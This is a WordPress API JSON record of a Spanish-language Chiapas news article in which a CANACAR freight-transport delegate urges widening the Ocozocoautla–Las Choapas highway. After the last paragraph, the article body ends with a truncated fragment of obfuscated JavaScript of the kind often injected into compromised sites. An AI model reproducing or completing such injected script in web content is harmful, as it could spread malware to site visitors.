{"id":17772,"date":"2024-09-10T02:31:30","date_gmt":"2024-09-10T02:31:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17772"},"modified":"2024-09-10T02:31:31","modified_gmt":"2024-09-10T02:31:31","slug":"tramo-ocozocoautla-las-chopas-se-ha-quedado-estrecho-para-la-circulacion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17772","title":{"rendered":"Tramo Ocozocoautla-Las Chopas se ha quedado &#8220;estrecho&#8221; para la circulaci\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"766\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240909-WA0038-766x1024.jpg\" alt=\"\" class=\"wp-image-17773\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240909-WA0038-766x1024.jpg 766w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240909-WA0038-224x300.jpg 224w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240909-WA0038-768x1027.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240909-WA0038.jpg 957w\" sizes=\"auto, (max-width: 766px) 100vw, 766px\" \/><\/figure>\n\n\n\n<p>Jaime Mart\u00ednez.<\/p>\n\n\n\n<p>9 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Raquel Gordillo Cano, delegado en Chiapas de la C\u00e1mara Nacional del Autotransporte de Carga (CANACAR) , hizo en nombre del gremio que representa, un llamado a las autoridades competentes a realizar la ampliaci\u00f3n del tramo Ocococoautla-Las Choapas.<\/p>\n\n\n\n<p>Argument\u00f3 que, este tramo adem\u00e1s de estar en malas condiciones, requiere ser m\u00e1s ancho para mejorar la circulaci\u00f3n y evitar un mayor n\u00famero de accidentes.<\/p>\n\n\n\n<p>Reconoci\u00f3 que, en el caso del transporte de carga pesada los asaltos han disminuido, sin embargo, son los accidentes los problemas que actualmente enfrentan.<\/p>\n\n\n\n<p>\u201cHemos sufrido muchos accidentes en esta carretera, la cual ya no nos alcanza para circular, el flujo vehicular es muy alto, por eso se presentan muchos siniestros\u201d, coment\u00f3.<\/p>\n\n\n\n<p>Agreg\u00f3 que, caso contrario ocurre con las unidades de transporte p\u00fablico y los autos particulares, que s\u00ed han sido asaltados, o robados.<\/p>\n\n\n\n<p>En relaci\u00f3n a este tema dijo que, el costo de las mercanc\u00edas que se transporta es muy alto y el margen de ganancia es bajo, las empresas que comercializan no aseguran la carga.<\/p>\n\n\n\n<p>\u201cPrefieren no asegurar y en caso de siniestro absorben el costo de la carga, es un tema que cada transportista asume\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Actualmente los transportistas carga est\u00e1n moviendo fuera del estado ma\u00edz y caf\u00e9, aunque, la realidad es que, cada vez es menor la cantidad transportada.<\/p>\n\n\n\n<p>Record\u00e9 que, como transportistas de carga federal, la delegaci\u00f3n en Chiapas de la CANACAR, tiene cuatro meses que se constituy\u00f3.<\/p>\n\n\n\n<p>\u201cNo hab\u00edamos tenido la oportunidad de solicitar urgentemente, la ampliaci\u00f3n de esta carretera en el tramo Ocozocoautla-Las Choapas, ya es imposible transitar; incluso creemos que disminuir\u00edan los asaltos porque habr\u00eda una mejor circulaci\u00f3n ser\u00eda lo mejor para nuestro estado\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jaime Mart\u00ednez. 9 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Raquel Gordillo Cano, delegado en Chiapas de la C\u00e1mara Nacional del Autotransporte de Carga (CANACAR) , hizo en nombre del gremio que representa, un llamado a las autoridades competentes a realizar la ampliaci\u00f3n del tramo Ocococoautla-Las Choapas. Argument\u00f3 que, este tramo adem\u00e1s de estar en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17773,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-17772","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17772","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17772"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17772\/revisions"}],"predecessor-version":[{"id":17774,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17772\/revisions\/17774"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17773"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17772"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17772"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17772"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}